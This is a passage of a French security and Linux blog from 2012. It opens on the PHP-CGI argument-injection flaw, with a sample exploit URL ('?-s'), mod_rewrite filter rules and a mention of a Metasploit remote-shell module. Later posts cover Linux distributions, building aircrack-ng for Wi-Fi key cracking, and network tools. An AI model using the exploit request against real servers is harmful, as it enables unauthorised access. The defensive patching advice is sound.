Un exemple simple de requête permettant d'afficher la source d'une page (grâce au paramètre -s) :

http://cible.com/index.php?-s

Une correction vite !

Il y a deux possibilités :

La première consiste à mettre à jour PHP en 5.3.12 ou 5.4.2.

La seconde, plus manuelle, est de mettre en place des règles pour mod_rewrite qui permettront de filtrer les requêtes incriminées :

RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L]

Ou également :

RewriteEngine on
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|\- [NC]
RewriteRule .? - [F,L]

En bonus, le module pour Metasploit, nommé php_cgi_arg_injection.

Il utilise le paramètre -d qui modifie le comportement d'une page PHP afin d'avoir accès à un shell à distance.

www.eindbazen.net

www.php.net

LMDE 201204

2012-04-26T14:43:00.001+02:00

Linux Mint Debian Edition (LMDE) 201204 est disponible ! Pour les nouveaux, c'est une distribution Linux qui contient l'ensemble des atouts de Linux Mint (esthétisme, simplicité, logiciels par défaut, etc) et la solide réputation de Debian.

Une des différences avec Linux Mint "classique", c'est que cette version est une semi-rolling release, elle est donc mise à jour par le biais d'un système de Update Pack qui contiennent un gros lot de nouveautés, en grande majorité stables.

LMDE est basée sur une Debian Testing.

La révision 201204 comporte pas mal de grosses nouveautés :

Kernel 3.2
MATE 1.2
Cinnamon 1.4
Xfce 4.8
MDM
Update Pack 4

Les 3 éditions (MATE, Cinnamon et Xfce) utilisent le même gestionnaire d'affichage, soit MDM. Il ressemble au niveau fonctionnalités au prédécesseur, GDM 2.20.

Pour faire simple, les environnements MATE et Cinnamon sont dans la même image ISO et sont disponibles au choix, à l'écran de connexion, dès l'installation. Pour Xfce, c'est une image ISO à part.

Cinnamon

MATE

Xfce

Privilégiez le téléchargement par Torrent,

Ça va plus vite, ça évite de surcharger les serveurs, et vous partagez aux autres :)

LMDE 201204 MATE/Cinnamon 32 bits [Torrent] [HTTP]

LMDE 201204 MATE/Cinnamon 64 bits [Torrent] [HTTP]

LMDE 201204 Xfce 32 bits [Torrent] [HTTP]

LMDE 201204 Xfce 64 bits [Torrent] [HTTP]

www.linuxmint.com

BackBox Linux 2.05

2012-04-26T14:16:00.001+02:00

Backbox est une distribution Linux dédiée à l'évaluation de la sécurité d'un réseau informatique.

La version 2.05 de BackBox est toujours basée sur Ubuntu 11.04, le kernel 2.6.38 et Xfce 4.8.0 comme dans la précédente version. Dans la même voie que BackTrack, elle inclut des outils nécessaires de l'audit réseau à l'analyse et l'identification de vulnérabilité.

Les nouveautés ?

Mise à niveau du système
Corrections de bugs
Augmentation des performances
Le menu de démarrage a été amélioré
Amélioration du pilote WiFi (pour aircrack-ng)
De nouveaux outils : creepy, fern-wifi-cracker, joomscan, pyrit, reaver, xplico, etc.
Mise à jour de : crunch, fimap, hydra, magictree, metasploit, set, sipvicious, skipfish, w3af, weevely, wireshark, wirouterkeyrec, wpscan, zaproxy, theharvester, xsser, etc.

Pour faire tourner la bête, il ne demandera que 256Mo de RAM et une résolution de 800x600 au minimum. Il passe partout donc.

BackBox est utilisable en liveDVD/USB, ou même en l'installant directement sur le disque dur sur une partition de 5Go pour être à l'aise.

C'est une excellente alternative à BackTrack pour les petits netbooks peu puissants, comme la gamme des EeePC, cela est dû à l'environnement de bureau Xfce très léger.

Il est disponible en 32 et en 64 bits.

Téléchargement

www.backbox.org

La suite complète Aircrack-ng

2012-04-14T16:01:00.001+02:00

Comment avoir la toute dernière version du meilleur outil de sécurité Wi-Fi ? Suivez le guide.

Présentation :

Aircrack-ng est un groupe d'outils de surveillance pour réseau sans fil dont l'utilisation principale est le « cassage » de clés WEP et WPA-PSK des réseaux WIFI. C'est en fait une "reprise" du logiciel aircrack (premier du nom) qui a été abandonné.

En tant qu'outil de surveillance réseau, Aircrack a été conçu pour tester la sécurité de son propre réseau. Cependant, ces logiciels peuvent permettre à un cracker d'entrer sans autorisation sur un réseau informatique, ce que de nombreux pays répriment comme un délit. Wikipédia

La pratique !

Les lignes de commandes suivantes, vont nous permettre de disposer de la dernière version de la suite Aircrack-ng sur un environnement Linux :

1) Éventuellement, effacer l'ancienne installation :

sudo apt-get remove --purge aircrack-ng

2) Installation des paquets essentiels (tout sur une ligne) :

sudo apt-get install linux-headers-$(uname -r) build-essential make patch gettext autoconf subversion tcl8.5 openssl zlib1g zlib1g-dev libssh2-1-dev libssl-dev libnl1 libnl-dev libpcap0.8 libpcap0.8-dev python-scapy python-dev cracklib-runtime macchanger-gtk tshark ethtool sqlite3 libsqlite3-0 libsqlite3-dev

3) On télécharge les sources dans le dossier /tmp/aircrack-ng :

svn co http://trac.aircrack-ng.org/svn/trunk /tmp/aircrack-ng

4) On ce déplace dans le dossier /tmp/aircrack-ng, et on compile la suite entière (Sqlite + Unstable) :

cd /tmp/aircrack-ng/ && sudo make sqlite=true unstable=true

5) Place à l'installation :

sudo make sqlite=true unstable=true install

6) On met à jour airodump-ng (une connexion internet est nécessaire) :

sudo airodump-ng-oui-update

7) Pour connaître la version installée :

sudo aircrack-ng | head -n 2

Maintenant , place au ~~travail~~ jeu !

www.aircrack-ng.org

Est-ce que ma version de Java est vulnérable ?

2012-03-31T18:08:00.002+02:00

Comment savoir rapidement si la version de Java installée sur une machine est vulnérable ?

Les failles présentes dans Java peuvent facilement corrompre toute la sécurité mise en place sur une machine. Ce type d'attaque ce déroule durant la navigation (donc par le navigateur, tous confondus) sur le Web, le but est d'envoyer à la cible un petit .jar modifié (par exemple celui-ci) afin de prendre le contrôle de l'ordinateur.

Ces failles sont, en général, rapidement corrigées.

Comment vérifier si il y a un risque ou pas ?

Simplement en allant faire un petit tour sur ce site www.isjavaexploitable.com

C'est Rapid7 (Metasploit) qui l'a mis en place.

Environ 65% des installations de Java sont obsolètes, et donc vulnérables !

Il ira vérifier si vous courrez potentiellement un risque suivant la version de Java.

Auquel cas, il conseillera vivement de passer par la case mise à jour.

Alors plutôt rouge ou plutôt vert ?

Linux - Convertir une page du manuel en PDF

2012-03-29T22:14:00.000+02:00

Qui n'a jamais voulu exporter une man page ?

man page ?

Les pages de manuel Linux (man pages) sont la documentation de référence de l'utilisateur du système de type Linux (de l'utilisateur de base à l'administrateur en passant par le développeur). Elles regroupent l'ensemble des commandes/fonctions disponiblent sur le système en différentes sections. man.developpez.com

Il suffit d'avoir au préalable ps2pdf et ghostscript d'installé sur la machine, puis :

root@localhost:~$ man -t manpage | ps2pdf - manuel.pdf

Où manpage est votre programme.

Par exemple pour avoir la version PDF de aircrack-ng :

root@localhost:~$ man -t aircrack-ng | ps2pdf - aircrack.pdf

Dans le répertoire courant, un PDF nommé aircrack.pdf sera créé et qui contiendra l'ensemble du man d'aircrack-ng :)

Linux - mtr, mieux que traceroute et ping

2012-03-19T22:29:00.003+01:00

L'outil mtr combine les fonctionnalités des programmes traceroute et ping dans un seul et unique outil de diagnostic réseau.

Quand mtr démarre, il trace la connexion réseau entre l'hôte et la cible en envoyant des paquets avec des TTL volontairement faibles. Il continue d'envoyer des paquets avec une faible durée de vie en notant le temps de réponse des routeurs intermédiaires. Cela permet d'afficher le pourcentage de réponse, ainsi que le temps de réponse de chaque nœud.

Une augmentation soudaine de pertes de paquets ou du temps de réponse est souvent une indication d'une mauvaise connexion, ou tout simplement qu'un hôte est surchargé.

On essaye ?
Il est disponible dans les dépôts

root@localhost ~$ mtr google.com

Je vous laisse apprécier le résultat :)